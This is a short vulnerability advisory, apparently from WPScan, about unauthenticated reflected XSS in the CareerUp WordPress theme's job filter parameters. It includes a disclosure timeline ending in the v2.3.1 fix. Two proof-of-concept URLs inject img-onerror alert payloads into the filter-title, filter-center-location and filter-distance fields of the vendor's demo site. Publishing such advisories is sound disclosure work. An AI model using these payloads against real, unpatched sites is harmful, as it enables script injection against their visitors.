Description
There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp theme, via the filter parameters.
Edit (WPScanTeam)
May 27th, 2020 - Vendor Contacted by Original Submitter.
May 29th, 2020 - v2.3.0 Released. Unclear if issue fixed.
June 18th, 2020 - Another submitter (Vlad Vector) reported the same issue. Report escalated to Envato
June 18th, 2020 - v2.3.1 released. Issue confirmed to be fixed.
https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-center-location=&filter-center-latitude=&filter-center-longitude=&filter-distance=50
https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E
https://wpscan.com/vulnerability/a30a1430-c474-4cd1-877c-35c4ab624170